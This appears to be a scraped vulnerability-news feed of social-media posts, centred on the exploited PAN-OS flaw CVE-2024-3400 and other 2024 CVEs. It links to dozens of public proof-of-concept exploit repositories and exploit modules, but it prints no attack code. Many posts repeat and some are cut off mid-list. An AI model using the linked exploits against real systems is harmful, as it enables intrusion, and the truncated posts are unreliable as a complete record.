https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
##CVE-2024-20356: Jailbreaking a #Cisco appliance to run DOOM #ciscown
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
##updated 2024-04-23T19:57:25.207000
39 posts
33 repos
https://github.com/AdaniKamal/CVE-2024-3400
https://github.com/CONDITIONBLACK/CVE-2024-3400-POC
https://github.com/LoanVitor/CVE-2024-3400-
https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan
https://github.com/marconesler/CVE-2024-3400
https://github.com/hahasagined/CVE-2024-3400
https://github.com/zam89/CVE-2024-3400-pot
https://github.com/Kr0ff/cve-2024-3400
https://github.com/FoxyProxys/CVE-2024-3400
https://github.com/HackingLZ/panrapidcheck
https://github.com/ihebski/CVE-2024-3400
https://github.com/CerTusHack/CVE-2024-3400-PoC
https://github.com/codeblueprint/CVE-2024-3400
https://github.com/ak1t4/CVE-2024-3400
https://github.com/0x0d3ad/CVE-2024-3400
https://github.com/momika233/CVE-2024-3400
https://github.com/stronglier/CVE-2024-3400
https://github.com/sxyrxyy/CVE-2024-3400-Check
https://github.com/pwnj0hn/CVE-2024-3400
https://github.com/retkoussa/CVE-2024-3400
https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection
https://github.com/index2014/CVE-2024-3400-Checker
https://github.com/h4x0r-dz/CVE-2024-3400
https://github.com/Yuvvi01/CVE-2024-3400
https://github.com/Ravaan21/CVE-2024-3400
https://github.com/schooldropout1337/CVE-2024-3400
https://github.com/ZephrFish/CVE-2024-3400-Canary
https://github.com/MrR0b0t19/CVE-2024-3400
https://github.com/terminalJunki3/CVE-2024-3400-Checker
https://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker
https://github.com/phantomradar/cve-2024-3400-poc
Palo Alto Networks updated their security advisory for CVE-2024-3400:
We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.
This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.
Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb
#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR
##Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:
It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR
##You'd expect a government advisory to contain timely and reliable information. NCSC-UK warned about CVE-2024-3400 ten days after infosec publications broke the news. This advisory was difficult to locate even on their homepage. They only mention Unit 42 and Palo Alto Networks' blogs, not Volexity's. Nothing about indicators of compromise either. Their mitigation section sounds as though all available hotfixes weren't released already (they were). The only noteworthy statement is that "Palo Alto Networks is aware of increasing exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties."🔗 https://www.ncsc.gov.uk/news/exploitation-palo-alto-globalprotect-gateway-vulnerability
##Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ and advisory https://cert-portal.siemens.com/productcert/html/ssa-750274.html
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC
##Palo Alto Networks updated their security advisory for CVE-2024-3400:
We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.
This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.
Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb
#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR
##Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:
It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR
##Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ and advisory https://cert-portal.siemens.com/productcert/html/ssa-750274.html
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks updated their security advisory for CVE-2024-3400:
We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.
This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.
Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb
#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR
##Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:
It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR
##You'd expect a government advisory to contain timely and reliable information. NCSC-UK warned about CVE-2024-3400 ten days after infosec publications broke the news. This advisory was difficult to locate even on their homepage. They only mention Unit 42 and Palo Alto Networks' blogs, not Volexity's. Nothing about indicators of compromise either. Their mitigation section sounds as though all available hotfixes weren't released already (they were). The only noteworthy statement is that "Palo Alto Networks is aware of increasing exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties."🔗 https://www.ncsc.gov.uk/news/exploitation-palo-alto-globalprotect-gateway-vulnerability
##Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ and advisory https://cert-portal.siemens.com/productcert/html/ssa-750274.html
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC
##Palo Alto Networks updated their security advisory for CVE-2024-3400:
We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.
This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.
Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb
#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR
##Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:
It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR
##Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ and advisory https://cert-portal.siemens.com/productcert/html/ssa-750274.html
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Time to set your Palo firewalls on fire: https://security.paloaltonetworks.com/CVE-2024-3400
##Palo Alto firewalls: CVE-2024-3400 exploitation and PoCs for persistence after resets/upgrades https://www.helpnetsecurity.com/2024/04/30/palo-alto-firewalls-persistence-cve-2024-3400-exploitation/ #PaloAltoNetworks #Don'tmiss #Hotstuff #firewall #exploit #News #PoC
##Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##Another script for check or exploiting the CVE-2024-3400 (PAN-OS) vulnerability:
https://exploitalert.com/view-details/palo-alto-pan-os-command-execution-arbitrary-file-creation
##@arstechnica >Perimeter devices ought to prevent network hacks. Why are so many devices allowing attacks?
Because of shitty engineering and nobody giving a fuck about doing things right.
It just isn't more exciting than that. Sorry.
A great recent example is the shoddy Python in Palo Alto devices (CVE-2024-3400), and of course being run as root because why not:
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
Siemens revealed that its Ruggedcom APE1808 devices configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400. https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/
##The issue, tracked as CVE-2024-3400 (CVSS score of 10/10), is described as a command injection in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks’ appliances. https://www.securityweek.com/thousands-of-palo-alto-firewalls-potentially-impacted-by-exploited-vulnerability/
##Time to set your Palo firewalls on fire: https://security.paloaltonetworks.com/CVE-2024-3400
##Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##Another script for check or exploiting the CVE-2024-3400 (PAN-OS) vulnerability:
https://exploitalert.com/view-details/palo-alto-pan-os-command-execution-arbitrary-file-creation
##@arstechnica >Perimeter devices ought to prevent network hacks. Why are so many devices allowing attacks?
Because of shitty engineering and nobody giving a fuck about doing things right.
It just isn't more exciting than that. Sorry.
A great recent example is the shoddy Python in Palo Alto devices (CVE-2024-3400), and of course being run as root because why not:
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
Siemens revealed that its Ruggedcom APE1808 devices configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400. https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/
##The issue, tracked as CVE-2024-3400 (CVSS score of 10/10), is described as a command injection in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks’ appliances. https://www.securityweek.com/thousands-of-palo-alto-firewalls-potentially-impacted-by-exploited-vulnerability/
##updated 2024-04-23T15:30:35
1 posts
Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:
#CVE_2024_28073 #CVE_2024_29001 #CVE_2024_29003 #SolarWinds #PatchTuesday #vulnerability
##updated 2024-04-22T13:28:43.747000
4 posts
CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:
cc: @reverseics
##CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:
cc: @reverseics
##CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:
cc: @reverseics
##CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:
cc: @reverseics
##updated 2024-04-19T14:15:11.080000
2 posts
SolarWinds security advisory: SolarWinds Platform Arbitrary Open Redirection Vulnerability (CVE-2024-28076)
CVE-2024-28076 (7.0 high, disclosed 18 April 2024) arbitrary open redirection vulnerability. If exploited, a potential attacker can redirect to a different domain when using URL parameter with relative entry in the correct format.
Interestingly, SolarWinds wrote the vector as CVSS:7.0/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
I didn't know we were up to CVSSv7!!
SolarWinds security advisory: SolarWinds Platform Arbitrary Open Redirection Vulnerability (CVE-2024-28076)
CVE-2024-28076 (7.0 high, disclosed 18 April 2024) arbitrary open redirection vulnerability. If exploited, a potential attacker can redirect to a different domain when using URL parameter with relative entry in the correct format.
Interestingly, SolarWinds wrote the vector as CVSS:7.0/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
I didn't know we were up to CVSSv7!!
updated 2024-04-18T09:30:53
1 posts
Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:
#CVE_2024_28073 #CVE_2024_29001 #CVE_2024_29003 #SolarWinds #PatchTuesday #vulnerability
##updated 2024-04-17T18:31:37
1 posts
Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:
#CVE_2024_28073 #CVE_2024_29001 #CVE_2024_29003 #SolarWinds #PatchTuesday #vulnerability
##updated 2024-04-17T03:30:48
2 posts
updated 2024-04-17T00:31:31
4 posts
1 repos
CVE-2024-21111 – Local Privilege Escalation in Oracle VirtualBox https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
##Oracle VirtualBox LPE PoC: https://github.com/mansk1es/CVE-2024-21111
##CVE-2024-21111 – Local Privilege Escalation in Oracle VirtualBox https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
##Oracle VirtualBox LPE PoC: https://github.com/mansk1es/CVE-2024-21111
##updated 2024-04-17T00:31:29
4 posts
2 repos
JVNVU#91264077: PuTTY SSHクライアントのECDSA署名処理に脆弱性 https://jvn.jp/vu/JVNVU91264077/ 2024/04/18公開
「NIST P521楕円曲線によるECDSA秘密鍵を使っている場合、署名を行う際に生成するnonceに偏り...(CVE-2024-31497...)...60個程度の署名データから、使用している秘密鍵を特定される可能性」
##Thanks to @gsuberland for this write up on CVE-2024-31497. Made for a fun discussion today.
##Thanks to @gsuberland for this write up on CVE-2024-31497. Made for a fun discussion today.
##My thoughts on this are being driven by recent experiences RE CVE-2024-31497 on workstations and servers, but I want to listen to the folks who do this for a living before I start talking too much.
##updated 2024-04-16T23:24:40
2 posts
The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.
See this playlist of overview videos for an introduction to Malcolm and its main components.
Active
rather than Staged
, and uses tags instead to indicated that they were created through autopopulation.zeek-live
containers (#456). See this comment for more details.docker-compose.yml
files as it is now obsolete and caused a warning message that sometimes was not handled correctly.zeekctl deploy
instead of zeekctl restart
.Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh
) and PowerShell (release_cleaver.ps1
). See Downloading Malcolm - Installer ISOs for instructions.
#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #GitHub #INL #DHS #CISA #CISAgov #Kubernetes #Docker #raspberrypi
##The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.
See this playlist of overview videos for an introduction to Malcolm and its main components.
Active
rather than Staged
, and uses tags instead to indicated that they were created through autopopulation.zeek-live
containers (#456). See this comment for more details.docker-compose.yml
files as it is now obsolete and caused a warning message that sometimes was not handled correctly.zeekctl deploy
instead of zeekctl restart
.Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh
) and PowerShell (release_cleaver.ps1
). See Downloading Malcolm - Installer ISOs for instructions.
#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #GitHub #INL #DHS #CISA #CISAgov #Kubernetes #Docker #raspberrypi
##updated 2024-04-15T20:14:55.570000
4 posts
1 repos
https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE
SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2024-04-12T03:30:44
2 posts
SonicWall: GitLab XSS Via Autocomplete Results
SonicWall provided vulnerability details for a cross-site scripting (XSS) vulnerability in GitLab, tracked as CVE-2024-2279 (8.7 high severity). "This vulnerability arises due to a flaw in the input validation mechanism while displaying suggestions to the user using the feature called ‘autocomplete for issues reference’ in the rich text editor."
SonicWall: GitLab XSS Via Autocomplete Results
SonicWall provided vulnerability details for a cross-site scripting (XSS) vulnerability in GitLab, tracked as CVE-2024-2279 (8.7 high severity). "This vulnerability arises due to a flaw in the input validation mechanism while displaying suggestions to the user using the feature called ‘autocomplete for issues reference’ in the rich text editor."
updated 2024-04-11T21:32:40
2 posts
The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.
See this playlist of overview videos for an introduction to Malcolm and its main components.
Active
rather than Staged
, and uses tags instead to indicated that they were created through autopopulation.zeek-live
containers (#456). See this comment for more details.docker-compose.yml
files as it is now obsolete and caused a warning message that sometimes was not handled correctly.zeekctl deploy
instead of zeekctl restart
.Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh
) and PowerShell (release_cleaver.ps1
). See Downloading Malcolm - Installer ISOs for instructions.
#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #GitHub #INL #DHS #CISA #CISAgov #Kubernetes #Docker #raspberrypi
##The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.
See this playlist of overview videos for an introduction to Malcolm and its main components.
Active
rather than Staged
, and uses tags instead to indicated that they were created through autopopulation.zeek-live
containers (#456). See this comment for more details.docker-compose.yml
files as it is now obsolete and caused a warning message that sometimes was not handled correctly.zeekctl deploy
instead of zeekctl restart
.Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh
) and PowerShell (release_cleaver.ps1
). See Downloading Malcolm - Installer ISOs for instructions.
#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #GitHub #INL #DHS #CISA #CISAgov #Kubernetes #Docker #raspberrypi
##updated 2024-04-11T21:30:50
2 posts
Microsoft Security Response Center (MSRC) ominously updated CVE-2024-26198 (8.8 high, disclosed 12 March 2024) which is a Microsoft Exchange Server Remote Code Execution Vulnerability. FYI, not exploited, not publicly disclosed, exploitation is less likely. 🔗 https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-26198
Microsoft is announcing the release of a new version of the Microsoft Exchange Server updates to address all known issues that were identified in the March 2024 Security Updates. Microsoft strongly recommends installing these new updates to address the vulnerability identified by CVE-2024-26198.
I did a quick search of their 2024 March Release Notes and CVE-2024-26198 is the only Exchange vulnerability.
#CVE_2024_26198 #Microsoft #MSRC #vulnerability #PatchTuesday
##Microsoft Security Response Center (MSRC) ominously updated CVE-2024-26198 (8.8 high, disclosed 12 March 2024) which is a Microsoft Exchange Server Remote Code Execution Vulnerability. FYI, not exploited, not publicly disclosed, exploitation is less likely. 🔗 https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-26198
Microsoft is announcing the release of a new version of the Microsoft Exchange Server updates to address all known issues that were identified in the March 2024 Security Updates. Microsoft strongly recommends installing these new updates to address the vulnerability identified by CVE-2024-26198.
I did a quick search of their 2024 March Release Notes and CVE-2024-26198 is the only Exchange vulnerability.
#CVE_2024_26198 #Microsoft #MSRC #vulnerability #PatchTuesday
##updated 2024-04-11T21:06:16
2 posts
1 repos
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##updated 2024-04-11T01:25:29.777000
4 posts
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
